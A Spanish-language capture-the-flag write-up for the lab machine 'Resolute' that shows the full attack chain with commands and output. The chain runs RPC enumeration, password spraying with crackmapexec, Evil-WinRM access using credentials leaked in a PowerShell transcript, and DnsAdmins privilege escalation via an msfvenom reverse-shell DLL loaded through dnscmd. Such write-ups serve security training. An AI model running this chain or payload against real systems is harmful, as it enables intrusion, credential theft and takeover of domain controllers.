Resolute
Resolute
Skills
- RPC Enumeration - Abusing querydispinfo
- CrackMapExec SMB Authentication Sprying
- Abusing WinRM - EvilWinRM
- Information Leakage
- Abusing DnsAdmins Group - dnscmd [Privilege Escalation]
- Creating a malicious DLL and injecting it into the dns service
Certificaciones
- OSCP
- OSEP
- eCPPTv
- Active Directory
Descripción
Resolute es una máquina medium windows, enumeramos mediante RPC y obtenemos una contraseña y un listado de usuarios, usamos crackampexec para obtener credenciales válidas. Obtenemos la contraseña de otro usuario y nos convertimos en él, este usuario está en el grupo DnsAdmins lo cual nos permite crear un DLL malicioso para escalar privilegios y convertirnos en Administrator
Reconocimiento
Se comprueba que la máquina está activa y se determina su sistema operativo, el ttl de las máquinas windows suele ser 128, en este caso hay un nodo intermediario que hace que el ttl disminuya en una unidad
1
2
3
4
5
6
7
8
9
# ping 10.129.96.155
PING 10.129.96.155 (10.129.96.155) 56(84) bytes of data.
64 bytes from 10.129.96.155: icmp_seq=1 ttl=127 time=88.9 ms
64 bytes from 10.129.96.155: icmp_seq=2 ttl=127 time=149 ms
64 bytes from 10.129.96.155: icmp_seq=3 ttl=127 time=60.4 ms
^C
--- 10.129.96.155 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2003ms
rtt min/avg/max/mdev = 60.373/99.537/149.326/37.083 ms
Nmap
Se va a realizar un escaneo de todos los puertos abiertos en el protocolo TCP a través de nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
# sudo nmap -p- --open --min-rate 5000 -sS -Pn -n -v 10.129.96.155 -oG openPorts
[sudo] password for justice-reaper:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-12 23:18 CEST
Initiating SYN Stealth Scan at 23:18
Scanning 10.129.96.155 [65535 ports]
Discovered open port 139/tcp on 10.129.96.155
Discovered open port 135/tcp on 10.129.96.155
Discovered open port 53/tcp on 10.129.96.155
Discovered open port 445/tcp on 10.129.96.155
Discovered open port 49664/tcp on 10.129.96.155
Discovered open port 49711/tcp on 10.129.96.155
Discovered open port 47001/tcp on 10.129.96.155
Discovered open port 5985/tcp on 10.129.96.155
Discovered open port 49666/tcp on 10.129.96.155
Discovered open port 49665/tcp on 10.129.96.155
Discovered open port 49670/tcp on 10.129.96.155
Discovered open port 9389/tcp on 10.129.96.155
Discovered open port 389/tcp on 10.129.96.155
Discovered open port 49677/tcp on 10.129.96.155
Discovered open port 49667/tcp on 10.129.96.155
Discovered open port 593/tcp on 10.129.96.155
Discovered open port 49737/tcp on 10.129.96.155
Discovered open port 636/tcp on 10.129.96.155
Discovered open port 49676/tcp on 10.129.96.155
Discovered open port 464/tcp on 10.129.96.155
Discovered open port 49686/tcp on 10.129.96.155
Discovered open port 3268/tcp on 10.129.96.155
Discovered open port 3269/tcp on 10.129.96.155
Discovered open port 88/tcp on 10.129.96.155
Completed SYN Stealth Scan at 23:18, 13.81s elapsed (65535 total ports)
Nmap scan report for 10.129.96.155
Host is up (0.14s latency).
Not shown: 65297 closed tcp ports (reset), 214 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49670/tcp open unknown
49676/tcp open unknown
49677/tcp open unknown
49686/tcp open unknown
49711/tcp open unknown
49737/tcp open unknown
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 13.91 seconds
Raw packets sent: 67629 (2.976MB) | Rcvd: 66184 (2.649MB)
Se procede a realizar un análisis de detección de servicios y la identificación de versiones utilizando los puertos abiertos encontrados
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
# nmap -sCV -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49670,49676,49677,49686,49711,49737 10.129.96.155 -oN services
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-12 23:18 CEST
Nmap scan report for 10.129.96.155
Host is up (0.13s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-12 21:25:58Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49686/tcp open msrpc Microsoft Windows RPC
49711/tcp open msrpc Microsoft Windows RPC
49737/tcp open msrpc Microsoft Windows RPC
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h27m00s, deviation: 4h02m31s, median: 6m59s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Resolute
| NetBIOS computer name: RESOLUTE\x00
| Domain name: megabank.local
| Forest name: megabank.local
| FQDN: Resolute.megabank.local
|_ System time: 2024-08-12T14:26:52-07:00
| smb2-time:
| date: 2024-08-12T21:26:51
|_ start_date: 2024-08-12T21:23:10
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.52 seconds
RPC Enumeration
Enumeramos el servicio RPC, he usado esta herramienta de github https://github.com/rubenza02/rpcenumeration que automatiza todo el proceso
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
# rpcenumeration -s 10.129.96.155 -n -f full_report
Generando informe completo para el servidor 10.129.96.155...
Enumerando usuarios...
Enumerando usuarios en el servidor 10.129.96.155...
Usuario RID
------ ---
Administrator 0x1f4
Guest 0x1f5
krbtgt 0x1f6
DefaultAccount 0x1f7
ryan 0x451
marko 0x457
sunita 0x19c9
abigail 0x19ca
marcus 0x19cb
sally 0x19cc
fred 0x19cd
angela 0x19ce
felicia 0x19cf
gustavo 0x19d0
ulf 0x19d1
stevie 0x19d2
claire 0x19d3
paulo 0x19d4
steve 0x19d5
annette 0x19d6
annika 0x19d7
per 0x19d8
claude 0x19d9
melanie 0x2775
zach 0x2776
simon 0x2777
naoki 0x2778
Enumerando grupos...
Enumerando grupos en el servidor 10.129.96.155...
Grupo RID
----- ---
Enterprise Read-only Domain Controllers 0x1f2
Domain Admins 0x200
Domain Users 0x201
Domain Guests 0x202
Domain Computers 0x203
Domain Controllers 0x204
Schema Admins 0x206
Enterprise Admins 0x207
Group Policy Creator Owners 0x208
Read-only Domain Controllers 0x209
Cloneable Domain Controllers 0x20a
Protected Users 0x20d
Key Admins 0x20e
Enterprise Key Admins 0x20f
DnsUpdateProxy 0x44e
Contractors 0x44f
Enumerando recursos compartidos...
Enumerando recursos compartidos en el servidor 10.129.96.155...
Recurso Tipo
------- ----
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
Enumerando miembros de grupos...
Enumerando miembros de grupos en el servidor 10.129.96.155...
Grupo Miembro
----- -------
Obteniendo políticas de contraseña...
Enumerando políticas de contraseña en el servidor 10.129.96.155...
min_password_length: 7
password_properties: 0x00000000
Obteniendo información del usuario (especificar nombre)...
Introduzca el nombre del usuario para obtener información:
Administrator
Obteniendo información del usuario Administrator en el servidor 10.129.96.155...
User Name : Administrator
Full Name :
Home Drive :
Dir Drive :
Profile Path:
Logon Script:
Description : Built-in account for administering the computer/domain
Workstations:
Comment :
Remote Dial :
Logon Time : Mon, 12 Aug 2024 23:24:16 CEST
Logoff Time : Thu, 01 Jan 1970 01:00:00 CET
Kickoff Time : Thu, 01 Jan 1970 01:00:00 CET
Password last set Time : Mon, 12 Aug 2024 23:48:03 CEST
Password can change Time : Tue, 13 Aug 2024 23:48:03 CEST
Password must change Time: Thu, 14 Sep 30828 04:48:05 CEST
unknown_2[0..31]...
user_rid : 0x1f4
group_rid: 0x201
acb_info : 0x00000210
fields_present: 0x00ffffff
logon_divs: 168
bad_password_count: 0x00000000
logon_count: 0x00000083
padding1[0..7]...
logon_hrs[0..21]...
Enumerando impresoras...
Enumerando impresoras en el servidor 10.129.96.155...
Impresora Descripción
--------- -----------
do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
Consultando información del servidor...
Consultando configuración del servidor 10.129.96.155...
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
Consultando información de la disposición...
Consultando información de la disposición del servidor 10.129.96.155...
index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail Name: (null) Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0x10b4 RID: 0x19ce acb: 0x00000010 Account: angela Name: (null) Desc: (null)
index: 0x10bc RID: 0x19d6 acb: 0x00000010 Account: annette Name: (null) Desc: (null)
index: 0x10bd RID: 0x19d7 acb: 0x00000010 Account: annika Name: (null) Desc: (null)
index: 0x10b9 RID: 0x19d3 acb: 0x00000010 Account: claire Name: (null) Desc: (null)
index: 0x10bf RID: 0x19d9 acb: 0x00000010 Account: claude Name: (null) Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null) Desc: A user account managed by the system.
index: 0x10b5 RID: 0x19cf acb: 0x00000010 Account: felicia Name: (null) Desc: (null)
index: 0x10b3 RID: 0x19cd acb: 0x00000010 Account: fred Name: (null) Desc: (null)
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0x10b6 RID: 0x19d0 acb: 0x00000010 Account: gustavo Name: (null) Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus Name: (null) Desc: (null)
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!
index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie Name: (null) Desc: (null)
index: 0x10c3 RID: 0x2778 acb: 0x00000010 Account: naoki Name: (null) Desc: (null)
index: 0x10ba RID: 0x19d4 acb: 0x00000010 Account: paulo Name: (null) Desc: (null)
index: 0x10be RID: 0x19d8 acb: 0x00000010 Account: per Name: (null) Desc: (null)
index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan Name: Ryan Bertrand Desc: (null)
index: 0x10b2 RID: 0x19cc acb: 0x00000010 Account: sally Name: (null) Desc: (null)
index: 0x10c2 RID: 0x2777 acb: 0x00000010 Account: simon Name: (null) Desc: (null)
index: 0x10bb RID: 0x19d5 acb: 0x00000010 Account: steve Name: (null) Desc: (null)
index: 0x10b8 RID: 0x19d2 acb: 0x00000010 Account: stevie Name: (null) Desc: (null)
index: 0x10af RID: 0x19c9 acb: 0x00000010 Account: sunita Name: (null) Desc: (null)
index: 0x10b7 RID: 0x19d1 acb: 0x00000010 Account: ulf Name: (null) Desc: (null)
index: 0x10c1 RID: 0x2776 acb: 0x00000010 Account: zach Name: (null) Desc: (null)
SMB Enumeration
Nos creamos un fichero con todos los usuarios y con crackmapexec enumeramos en busca de credenciales válidas y encontramos melanie:Welcome123!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
# crackmapexec smb 10.129.96.155 -u users -p 'Welcome123!' --continue-on-succes
SMB 10.129.96.155 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\Administrator:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\Guest:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\krbtgt:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\DefaultAccount:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\ryan:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\sunita:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\abigail:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\marcus:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\sally:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\fred:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\angela:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\felicia:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\gustavo:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\ulf:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\stevie:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\claire:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\paulo:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\steve:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\annette:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\annika:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\per:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\claude:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [+] megabank.local\melanie:Welcome123!
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\zach:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\simon:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\naoki:Welcome123! STATUS_LOGON_FAILURE
WINRM Enumeration
Validamos si las credenciales son válidas para conectarnos a través de WINRM
1
2
3
4
# crackmapexec winrm 10.129.96.155 -u 'melanie' -p 'Welcome123!'
SMB 10.129.96.155 5985 RESOLUTE [*] Windows 10 / Server 2016 Build 14393 (name:RESOLUTE) (domain:megabank.local)
HTTP 10.129.96.155 5985 RESOLUTE [*] http://10.129.96.155:5985/wsman
WINRM 10.129.96.155 5985 RESOLUTE [+] megabank.local\melanie:Welcome123! (Pwn3d!)
Intrusión
Debido a que tenemos unas credenciales válidas nos conectamos como el usuario melanie a la máquina víctima
1
2
3
4
5
6
7
8
9
10
11
# evil-winrm -u 'melanie' -p 'Welcome123!' -i 10.129.96.155
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\melanie\Documents> whoami
megabank\melanie
Privilege Escalation
He encontrado este archivo oculto
1
2
3
4
5
6
7
8
9
*Evil-WinRM* PS C:\PSTranscripts\20191203> dir -Force
Directory: C:\PSTranscripts\20191203
Mode LastWriteTime Length Name
---- ------------- ------ ----
-arh-- 12/3/2019 6:45 AM 3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
Al parece la contraseña del usuario ryan está en el archivo
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
*Evil-WinRM* PS C:\PSTranscripts\20191203> type PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
Command start time: 20191203063455
**********************
PS>TerminatingError(): "System error."
>> CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Command start time: 20191203063455
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
PS megabank\ryan@RESOLUTE Documents>
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
Validamos la contraseña para el usuario ryan
1
2
3
4
# crackmapexec winrm 10.129.96.155 -u ryan -p 'Serv3r4Admin4cc123!'
SMB 10.129.96.155 5985 RESOLUTE [*] Windows 10 / Server 2016 Build 14393 (name:RESOLUTE) (domain:megabank.local)
HTTP 10.129.96.155 5985 RESOLUTE [*] http://10.129.96.155:5985/wsman
WINRM 10.129.96.155 5985 RESOLUTE [+] megabank.local\ryan:Serv3r4Admin4cc123! (Pwn3d!)
Nos conectamos como ryan
1
2
3
4
5
6
7
8
9
10
11
# evil-winrm -u 'ryan' -p 'Serv3r4Admin4cc123!' -i 10.129.96.155
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami
megabank\ryan
He encontrado este archivo de texto
1
2
3
4
*Evil-WinRM* PS C:\Users\ryan\Desktop> type note.txt
Email to team:
- due to change freeze, any system changes (apart from those to the administrator account) will be automatically reverted within 1 minute
Listamos los grupos a los que pertenecemos
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
*Evil-WinRM* PS C:\Users\ryan\Desktop> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors Group S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins Alias S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
Debido a que pertenecemos al grupo DnsAdmins podemos escalar privilegios https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges#dnsadmins. Lo primero que debemos hacer es crear un DLL malicioso con msfvenom
1
# msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.16.23 LPORT=443 -f dll > exploit.dll
En el mismo directorio donde se encuentra el DDL nos creamos un servidor SMB
1
# impacket-smbserver smbFolder $(pwd) -smb2support
Registramos el DLL
1
2
3
4
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd.exe /config /serverlevelplugindll \\10.10.16.23\smbFolder\exploit.dll
Registry property serverlevelplugindll successfully reset.
Command completed successfully.
En nuestro equipo nos ponemos en escucha con netcat
1
# nc -nlvp 443
Paramos el servicio
1
2
3
4
5
6
7
8
9
10
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe stop dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
Levantamos el servicio
1
2
3
4
5
6
7
8
9
10
11
12
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe start dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 3400
FLAGS :
Obtenemos una shell como nt authority\system, si no tuviéramos el privilegio de parar y levantar servicios tendríamos que haber crasheado el servicio DNS para que se reinicie. Es posible que tengamos que intentar multiples veces parar y levantar el servicio
1
2
3
4
5
6
7
8
9
# nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.16.23] from (UNKNOWN) [10.129.130.92] 49857
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
Esta entrada está licenciada bajo CC BY 4.0 por el autor.